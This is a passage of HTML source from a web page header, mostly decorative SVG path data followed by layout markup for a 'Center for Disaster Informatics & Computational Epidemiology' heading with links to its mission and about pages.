d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n </span><span class=\"h-button__outer style-679-outer style-local-22-h39-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/\" data-colibri-id=\"22-h39\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-679 style-local-22-h39 position-relative\"><!----><!----> <span>Learn more</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n <!---->\n <div 